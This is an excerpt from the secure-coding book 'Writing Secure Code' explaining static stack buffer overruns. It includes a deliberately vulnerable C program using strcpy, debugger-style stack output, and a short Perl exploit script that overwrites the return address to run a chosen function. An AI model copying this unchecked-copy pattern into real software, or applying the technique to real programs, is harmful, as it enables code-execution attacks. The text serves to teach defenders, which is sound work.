Static Buffer Overruns | Writing Secure Code, Second Edition

Static Buffer Overruns

A static buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the function s caller. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker. In a normal attack, the attacker can get a program with a buffer overrun to do something he considers useful, such as binding a command shell to the port of their choice. The attacker often has to overcome some interesting problems, such as the fact that the user input isn t completely unchecked or that only a limited number of characters will fit in the buffer. If you re working with double-byte character sets, the hacker might have to work harder, but the problems this introduces aren t insurmountable. If you re the type of programmer who enjoys arcane puzzles the classic definition of a hacker exploiting a buffer overrun can be an interesting exercise. (If you succeed, please keep it to yourself and behave responsibly with your information.) This particular intricacy is beyond the scope of this book, so I ll use a program written in C to show a simple exploit of an overrun. Let s take a look at the code:

/*This program shows an example of how a static buffer overrun can be used to execute arbitrary code. Its objective is to find an input string that executes the function bar. */ #include <stdio.h> #include <string.h> void foo(const char* input) { char buf[10]; //What? No extra arguments supplied to printf? //It's a cheap trick to view the stack 8-) //We'll see this trick again when we look at format strings. printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); //Pass the user input straight to secure code public enemy #1. strcpy(buf, input); printf("%s\n", buf); printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); } void bar(void) { printf("Augh! I've been hacked!\n"); } int main(int argc, char* argv[]) { //Blatant cheating to make life easier on myself printf("Address of foo = %p\n", foo); printf("Address of bar = %p\n", bar); foo(argv[1]); return 0; }

This application is nearly as simple as Hello, World. I start off doing a little cheating and printing the addresses of my two functions, foo and bar, by using the printf function s %p option, which displays an address. If I were hacking a real application, I d probably try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The real problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.

The best way to follow along is to compile the application from the command line to produce a release executable. Don t just load it into Microsoft Visual C++ and run it in debug mode the debug version contains checks for stack problems, and it won t demonstrate the problem properly. However, you can load the application into Visual C++ and run it in release mode. Let s take a look at some output after providing a string as the command line argument:

[d:\]StaticOverrun.exe Hello Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A <-- We want to overwrite the return address for foo. 00410EDE Hello Now the stack looks like: 6C6C6548 <-- You can see where "Hello" was copied in. 0000006F 7FFDF000 0012FF80 0040108A 00410EDE

Now for the classic test for buffer overruns we input a long string:

[d:\]StaticOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410ECE AAAAAAAAAAAAAAAAAAAAAAAA Now the stack looks like: 41414141 41414141 41414141 41414141 41414141 41414141

And we get the application error message claiming the instruction at 0x41414141 tried to access memory at address 0x41414141, as shown in Figure 3-1.

Figure 3-1

Application error message generated after the static buffer overrun occurs.

Note that if you don t have a development environment on your system, this information will be in the Dr. Watson logs. A quick look at the ASCII charts shows that the code for the letter A is 0x41. This result is proof that our application is exploitable. Warning! Just because you can t figure out a way to get this result does not mean that the overrun isn t exploitable. It means that you haven t worked on it long enough. Except in a few trivial cases, it generally isn t possible to prove that a buffer overrun isn t exploitable. You can prove only that something is exploitable, so any given buffer overrun either is exploitable or might be exploitable. In other words, if you can t prove that it s exploitable, always assume that an overrun is exploitable. If you tell the public that the buffer overrun in your application isn t exploitable, odds are someone will find a way to prove that it is exploitable just to embarrass you. Or worse, that person might find the exploit and inform only criminals. Now you ve misled your users to think the patch to fix the overrun isn t a high priority, and there s an active nonpublic exploit being used to attack your customers.

Let s take a look at how we find which characters to feed the application. Try this:

[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410EBE ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 54535251 58575655

The application error message now shows that we re trying to execute instructions at 0x54535251. Glancing again at our ASCII charts, we see that 0x54 is the code for the letter T, so that s what we d like to modify. Let s now try this:

[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRS Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 00000000 00000000 7FFDF000 0012FF80 0040108A 00410ECE ABCDEFGHIJKLMNOPQRS Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 00535251 00410ECE

Now we re getting somewhere! By changing the user input, we re able to manipulate where the program tries to execute the next instruction. Clearly, if we could send it 0x45, 0x10, 0x40 instead of QRS, we could get bar to execute. So how do you pass these odd characters 0x10 isn t printable on the command line? Like any good hacker, I ll use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line:

$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40"; $cmd = "StaticOverrun ".$arg; system($cmd);

Running this script produces the desired result:

[d:\devstudio\myprojects\staticoverrun]perl HackOverrun.pl Address of foo = 00401000 Address of bar = 00401045 My stack looks like: 77FB80DB 77F94E68 7FFDF000 0012FF80 0040108A 00410ECA ABCDEFGHIJKLMNOPE?@ Now the stack looks like: 44434241 48474645 4C4B4A49 504F4E4D 00401045 00410ECA Augh! I've been hacked!

That was easy, wasn t it? Looks like something even a junior programmer could have done. In a real attack, we d fill the first 16 characters with assembly code designed to do ghastly things to the victim and set the return address to the start of the buffer. Think about how easy this is to exploit next time you re working with user input.


	The 64-bit Intel Itanium does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It s just more difficult to make the overrun exploitable.